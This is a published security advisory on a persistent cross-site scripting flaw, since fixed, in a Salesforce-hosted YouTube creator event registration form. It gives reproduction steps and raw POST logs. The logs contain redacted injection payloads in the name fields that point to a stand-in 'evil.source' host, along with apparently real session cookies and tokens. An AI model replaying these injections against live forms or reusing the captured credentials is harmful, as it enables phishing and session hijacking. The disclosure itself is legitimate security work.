Document Title: =============== Salesforce RegistrationForm - Persistent Web Vulnerability Date: ===== 2018-06-21 References: =========== https://www.vulnerability-lab.com/get_content.php?id=2054 Salesforce Security ID: 219513 VL-ID: ===== 2054 Common Vulnerability Scoring System: ==================================== 4.3 Vulnerability Class: ==================== Cross Site Scripting - Persistent Introduction: ============= Salesforce.com is an American cloud computing company headquartered in San Francisco, California. Though its revenue comes from a customer relationship management (CRM) product, Salesforce also capitalizes on commercial applications of social networking through acquisition. As of early 2016, it is one of the most highly valued American cloud computing companies with a market capitalization above $55 billion, although the company has never turned a GAAP profit in any fiscal year since its inception in 1999. (Copy of the Homepage: https://en.wikipedia.org/wiki/Salesforce.com ) Abstract: ========= The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the Salesforce RegistrationForm web-application for google youtube. Report-Timeline: ================ 2018-06-22: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Salesforce Product: Event Registration - Online Service (Web-Application) v2017 Q1 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A persistent input validation vulnerability has been discovered in the salesforce event registration formular for the google youtube creators application. The vulnerability typ allows remote attackers to inject own malicious script code on the application-side to compromise modules and functions targeted client-side attacks. The issue injection point is the salesforce registration formular and the final affected vulnerable sender url is the original youtube domain server. Attackers are able to inject malicious script code to deliver manipulated emails via original youtube domain sender. The attack vector is located on the application-side and the request method to inject is POST. The risk of the vulnerability is estimated medium to high. The security risk of the persistent input validation vulnerability is estimated as medium with a cvss count of 4.2. Exploitation of the persistent input validation web vulnerability requires low user interaction and no privileged web-application customer user account. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Event Registration - Youtube Google Vulnerable Input Fields(s): [+] Firstname [+] Lastname Vulnerable Parameter(s): [+] j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA [+] j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA Affected Module(s): [+] Email & Frontend (creator-academy-noreply@youtube.com) Affected Domain(s): [+] youtube.com (google) [+] salesforce (force.com) Proof of Concept: ================= The persistent cross site vulnerability can be exploited by remote attackers without privilege web-application user account and with low user interaction. For security demonstration or to reproduce the security web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the vulnerability formular 2. Inject the test payloads and the vulnerable marked name input fields 3. Include random values and an exisiting test mailbox and save the request via POST Note: The wrong filtering application takes the data to the youtube creator events 4. An email arrives in the registered and unconfirmed emailbox by the original youtube sender 5. The execute of the payload occurs next to the name introduction in the email body message template generated by the dbms 6. Successful reproduce of the stored xss web vulnerability! Note: Both parties needs to fix the issue so i would like to combine the report to assist youtube on google and and salesforce by there bug bounty programs. PoC: Vulnerable Source PoC: Youtube Ajax Session Token QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajYzNmpGanYyLXNKOHlZRWQzODBITEVY bmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlIxTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJG c21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D --- PoC Session Logs [POST] (Injection Point) --- Status: 200[OK] POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage Mime Type[text/xml] Request Header: Host[youtube.secure.force.com] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw== &visit_id=1-636271849160336494- 3810832860&p=youtube_boot_camp&rd=1] Content-Length[137382] Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA] Connection[keep-alive] POST-Daten: AJAXREQUEST[_viewRoot] j_id0%3Aj_id32[j_id0%3Aj_id32] j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on] j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E] j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E] j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com] j_id0%3Aj_id32%3Aj_id155%3Aj_id177[] j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.] j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.] j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.] com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI6IjAwRDgwMDAwMDAwUE5UQSIsInYiOiIwMDAwMDAwMDAwMDAwMDAiLCJhIjoidmZlbmNyeXB0aW9ua2V5Ii widSI6IjAwNTgwMDAwMDA4OWhGbyJ9mBYmEqvd%2B%2BrqUb8vM1fzpu%2BWhaBToaYNeTJ7jwAAAVtJlHbic6ZoGz41Gk8BAG7fRxiwtjM%2B5P6hSLFA4efTPzm08kfq%2F%2B dzoOC95QLuLVPoyIIzHs6xtoomj7aD6qCap52FMutgqS2%2BZ] com.salesforce.visualforce.ViewStateVersion[201704062358210694] com.salesforce.visualforce.ViewStateMAC [AGV5SnViMjVqWlNJNkltdGZjRzFJVTNZNE5qQlpSR0pzV1hkd2RYWTBlVkF6YkhsMlQzbENOeTFXYWpZM1dHTnNiRVJMU21kY 2RUQXdNMlFpTENKMGVYQWlPaUp LVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU1VVFWd2lMRndpZGx3aU9sd2lNREF3TURBd01EQXdNR EF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmNJanBjSWpBd05UZ3dNREF3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjB JbDBzSW1saGRDSTZNVFE1TVRVNE9ERXhPREk0TVN3aVpYaHdJam93ZlE9PS4uX1VJN0g5elhIdjFwVnNOSm80dVJDaVZOaFBJQVIxT1AzVXA1bENfeGRXZz0%3D] j_id0%3Aj_id32%3AinitRegistration[j_id0%3Aj_id32%3AinitRegistration] [] Response Header: Date[Fri, 07 Apr 2017 18:03:07 GMT] x-xss-protection[1; mode=block] Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0] Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin] X-Powered-By[Salesforce.com ApexPages] p3p[CP="CUR OTR STA"] Ajax-Response[true] Content-Type[text/xml;charset=UTF-8] Vary[Accept-Encoding] Content-Encoding[gzip] Transfer-Encoding[chunked] - Status: 200[OK] POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage Mime Type[text/xml] Request Header: Host[youtube.secure.force.com] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw== &visit_id=1-636271849160336494- 3810832860&p=youtube_boot_camp&rd=1] Content-Length[137956] Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA] Connection[keep-alive] POST-Daten: AJAXREQUEST[j_id0%3Aj_id32%3Aj_id155%3Aj_id173] j_id0%3Aj_id32[j_id0%3Aj_id32] j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on] j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3Ciframe%3E%2520%3E%22%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E] j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E] j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com] j_id0%3Aj_id32%3Aj_id155%3Aj_id177[Yes] j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.] j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.] j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.] com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI6IjAwRDgwMDAwMDAwUE5UQSIsIWxcDiHyDaSOw17yd3Cg%3D] com.salesforce.visualforce.ViewStateVersion[201704062358210694] com.salesforce.visualforce.ViewStateMAC [AGV5SnViMjVqWlNJNkluWnlWa1owVDBoNFNrMTFOM0ZyV1dwTk9UbHNSR1JPUm1seFJtZHlTM0JuTWs1blJVSkVTR2g0VDNOY2RUQXdNMlFpT ENKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU1VVFWd2lMRndp ZGx3aU9sd2lNREF3TURBd01EQXdNREF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmNJanBjSWpBd05UZ3dNREF 3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjBJbDBzSW1saGRDSTZNVFE1TVRVNE9ERTRPRE01TUN3aVpYaHdJam93ZlE9PS4uVW9Qal BBWmNIQjhXRkU4Ulh0THB2T2VzYThkR2dxZE13ZFdOWnM4dVIzbz0%3D] j_id0%3Aj_id32%3Aj_id155%3Aj_id177%3Aj_id178[j_id0%3Aj_id32%3Aj_id155%3Aj_id177%3Aj_id178] [] Response Header: Date[Fri, 07 Apr 2017 18:03:12 GMT] x-xss-protection[1; mode=block] Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0] Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin] X-Powered-By[Salesforce.com ApexPages] p3p[CP="CUR OTR STA"] Ajax-Response[true] Content-Type[text/xml;charset=UTF-8] Vary[Accept-Encoding] Content-Encoding[gzip] Transfer-Encoding[chunked] - Status: 200[OK] POST https://www.youtube.com/creator_suggestions_ajax?new_state=EVENT_SEEN&suggestion=ytca_analytics_series_2016&location=LOCATION_CHANNEL_CHECKLIST&ui_type= UI_TYPE_DEFAULT&action_update_channel_suggestion=1 Mime Type[application/json] Request Header: Host[www.youtube.com] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate, br] X-YouTube-Client-Name[1] X-YouTube-Client-Version[1.20170406] X-YouTube-Identity-Token[QUFFLUhqbkJrbDU2d2cyQk82ZHBZVEc3Tmhyck9teHkzUXw=] X-YouTube-Page-CL[152397198] X-YouTube-Page-Label[youtube_20170406_0_RC2] X-YouTube-Variants-Checksum[2275f96a3a17364aca2366efd7c35d46] Content-Type[application/x-www-form-urlencoded] Referer[https://www.youtube.com/user/vulnerability0lab] Content-Length[284] Cookie[VISITOR_INFO1_LIVE=XKr3svEjLco; PREF=f1=50000000&f5=30; YSC=BnHxqoYEhPg; SID=igTRRvC2JTQVE0SXFw0-Jz7I_7brhhCMfb0JocaqLmzZwFWtpYplR1QDIa8VW3BeFKVebQ.; HSID=AfImtCSKjlhjrHodg; SSID=AhWHw2um0Z7WVLOQv; APISID=_ONLJITyRiSfF0or/AKPVNxNp084EAZmxm; SAPISID=tnogHnh4UrZzCXpK/AMF9HkrXhYZRzy2EY; CONSENT=YES+DE.de+20150712-15-0; LOGIN_INFO=AOmCA4wwRQIgekLu-fXR9_7sZgXdrFjyCn_V2riu05Uod5AfZgMn8Q8CIQC7NOOvc_ FfvwbmqBPi0MajBNCQO2AbfktTASPb9bwAdg:QUZVTU5Gd19RV3JFZUhXa 3FINUhSYmh5WE8xdDk4cmY5d25KaXB2M1NFYWUwYVY2UFdQMFQ3YWd0amx4QTVzYnZhNHBPb241NGFCMGQ3T05LcmhReEwyQTBKWnl4enMxOH FRTFBqY2tiRllIdDNCQk9PcnQyRVNPaGduakg1WVU0OTV5eFlVeW44dTNOc3BOM2M1c0pCVlJHNUVseTRBWU53] DNT[1] Connection[keep-alive] POST-Daten: o[U] session_token [QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajYzNmpGanYyLXNKOHlZRWQzODBITEVY bmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlIxTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJG c21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D] Response Header: Strict-Transport-Security[max-age=31536000] x-frame-options[SAMEORIGIN] Content-Length[15] Content-Disposition[attachment] X-Content-Type-Options[nosniff] Expires[Tue, 27 Apr 1971 19:44:06 EST] Cache-Control[no-cache] Content-Type[application/json; charset=UTF-8] Date[Fri, 07 Apr 2017 18:03:21 GMT] Server[YouTubeFrontEnd] x-xss-protection[1; mode=block] Alt-Svc[quic=":443"; ma=2592000; v="37,36,35"] X-Firefox-Spdy[h2] - Status: 200[OK] POST https://www.youtube.com/creator_suggestions_ajax?new_state=EVENT_SEEN&suggestion=ytca_community_2017&location=LOCATION_CHANNEL_CHECKLIST&ui_type=UI_TYPE_DEFAULT&action_update_channel_suggestion=1 Mime Type[application/json] Request Header: Host[www.youtube.com] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0] X-YouTube-Client-Name[1] X-YouTube-Client-Version[1.20170406] X-YouTube-Identity-Token[QUFFLUhqbkJrbDU2d2cyQk82ZHBZVEc3Tmhyck9teHkzUXw=] X-YouTube-Page-CL[152397198] X-YouTube-Page-Label[youtube_20170406_0_RC2] X-YouTube-Variants-Checksum[2275f96a3a17364aca2366efd7c35d46] Content-Type[application/x-www-form-urlencoded] Referer[https://www.youtube.com/user/vulnerability0lab] Content-Length[284] Cookie[VISITOR_INFO1_LIVE=XKr3svEjLco; PREF=f1=50000000&f5=30; YSC=BnHxqoYEhPg; SID=igTRRvC2JTQVE0SXFw0-Jz7I_7brhhCMfb0JocaqLmzZwFWtpYplR1QDIa8VW3BeFKVebQ.; HSID=AfImtCSKjlhjrHodg; SSID=AhWHw2um0Z7WVLOQv; APISID=_ONLJITyRiSfF0or/AKPVNxNp084EAZmxm; SAPISID=tnogHnh4UrZzCXpK/AMF9HkrXhYZRzy2EY; CONSENT=YES+DE.de+20150712-15-0; LOGIN_INFO=AOmCA4wwRQIgekLu-fXR9_7sZgXdrFjyCn_V2riu05Uod5AfZgMn8Q8CIQC7NOOvc_ FfvwbmqBPi0MajBNCQO2AbfktTASPb9bwAdg: QUZVTU5Gd19RV3JFZUhXa3FINUhSYmh5WE8xdDk4cmY5d25KaXB2M1NFYWUwYVY2UFdQMFQ3YWd0amx4QTVzYnZh NHBPb241NGFCMGQ3T05LcmhReEwyQTBKWnl4enMxOHFRTFBqY2tiRllIdDNCQk9PcnQyRVNPaGduakg1WVU0OTV5e FlVeW44dTNOc3BOM2M1c0pCVlJHNUVseTRBWU53; ST-1qyw03o=ei=8tPnWPWNE4O7WYKQkNgB&feature= rc-rel&ved=CMgDEPQcGAAiEwj1zrDO9pLTAhWDXRYKHQIIBBsomxw&csn=8tPnWPWNE4O7WYKQkNgB] Connection[keep-alive] POST-Daten: o[U] session_token [QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajY zNmpGanYyLXNKOHlZRWQzODBITEVYbmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlI xTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJGc21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D] Response Header: X-Content-Type-Options[nosniff] Content-Type[application/json; charset=UTF-8] Expires[Tue, 27 Apr 1971 19:44:06 EST] Strict-Transport-Security[max-age=31536000] Content-Length[15] x-frame-options[SAMEORIGIN] Cache-Control[no-cache] Content-Disposition[attachment] Date[Fri, 07 Apr 2017 18:03:26 GMT] Server[YouTubeFrontEnd] x-xss-protection[1; mode=block] Alt-Svc[quic=":443"; ma=2592000; v="37,36,35"] X-Firefox-Spdy[h2] - Status: 200[OK] POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage Mime Type[text/xml] Request Header: Host[youtube.secure.force.com] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw== &visit_id=1-636271849160336494- 3810832860&p=youtube_boot_camp&rd=1] Content-Length[137818] Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA] Connection[keep-alive] POST-Daten: AJAXREQUEST[_viewRoot] j_id0%3Aj_id32[j_id0%3Aj_id32] j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on] j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E] j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E] j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com] j_id0%3Aj_id32%3Aj_id155%3Aj_id177[Yes] j_id0%3Aj_id32%3Aj_id155%3Aj_id186[https%3A%2F%2Fwww.youtube.com%2Fuser%2FDellVlog] j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.] j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.] j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.] com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI3lYNdCa7hoyPCYB2pOU8KcV%2FuljILNXTK21XGpDFdR1RhEn%2BIaDaP1MJtc5lq1ZYj2vtBBwiM2XiyZ6ynF KIdgT53K5Pu28vND9fJ9Q8T%2FP%2FMxHqJ9ohFeKza8vyggT%2F72a%2FP] com.salesforce.visualforce.ViewStateVersion[201704062358210694] com.salesforce.visualforce.ViewStateMAC [AGV5SnViMjVqWlNJNkltVXRZbGxtTTBOTWNFZHNhbXBqVkhaa2RITjZVblJpWkdzd1VrbzJTbTVCUjFod1ExRTNhSEJXUlRCY2RUQXd NMlFpTENKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU 1VVFWd2lMRndpZGx3aU9sd2lNREF3TURBd01EQXdNREF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmN JanBjSWpBd05UZ3dNREF3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjBJbDBzSW1saGRDSTZNVFE1TVRVNE9ERTVNekF3TUN 3aVpYaHdJam93ZlE9PS4uQS10bExWZFhwT3VTVlFqWEhZeVdaSG5MMjBfRGlTTlhxU3ljYkdrandPUT0%3D] j_id0%3Aj_id32%3AinitRegistration[j_id0%3Aj_id32%3AinitRegistration] [] Response Header: Date[Fri, 07 Apr 2017 18:03:31 GMT] x-xss-protection[1; mode=block] Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0] Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin] X-Powered-By[Salesforce.com ApexPages] p3p[CP="CUR OTR STA"] Pragma[no-cache] Ajax-Response[true] Content-Type[text/xml;charset=UTF-8] Vary[Accept-Encoding] Content-Encoding[gzip] Transfer-Encoding[chunked] Reference(s): https://youtube.secure.force.com/ https://youtube.secure.force.com/EventRegistration/ https://youtube.secure.force.com/EventRegistration/EventRegistrationPage https://www.youtube.com/ https://www.youtube.com/creator_suggestions_ajax Solution: ========= 1. Restrict the input fields and disallow the usage of special chars 2. Parse all inputs or escape in case of processing the POST method request 3. Sanitize the output in the email notification on both parties force.com and youtube.com to prevent targeted exploitation The issue has been resolved by the salesforce developer team at the end of the year 2017 Q4. The issue was as well reported to google youtube to ensure that the malformed content through the input is not forwarded insecure to the customers or users. The issue has as been resolved on both parties. Risk: ===== The security risk of the persistent cross site scripting vulnerability is estimated as medium to high (CVSS 4.3). Targeted user accounts are not able to identify the manipulated content because of receiving through the original sender. Credits: ======== Vulnerability Laboratory [Core Research Team] - (research@vulnerability-lab.com) [www.vulnerability-lab.com] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™
Hey there, "><[MALICIOUS EXECUTE IN NAME]>%20>"<[MALICIOUS EXECUTE IN NAME]>!
So you’re ready to take on the world with your channel, huh? That’s awesome! Because we’ve got some pretty neat tools and ideas that can help you connect with people all over the globe. Ready to go? Just hit that big red button below.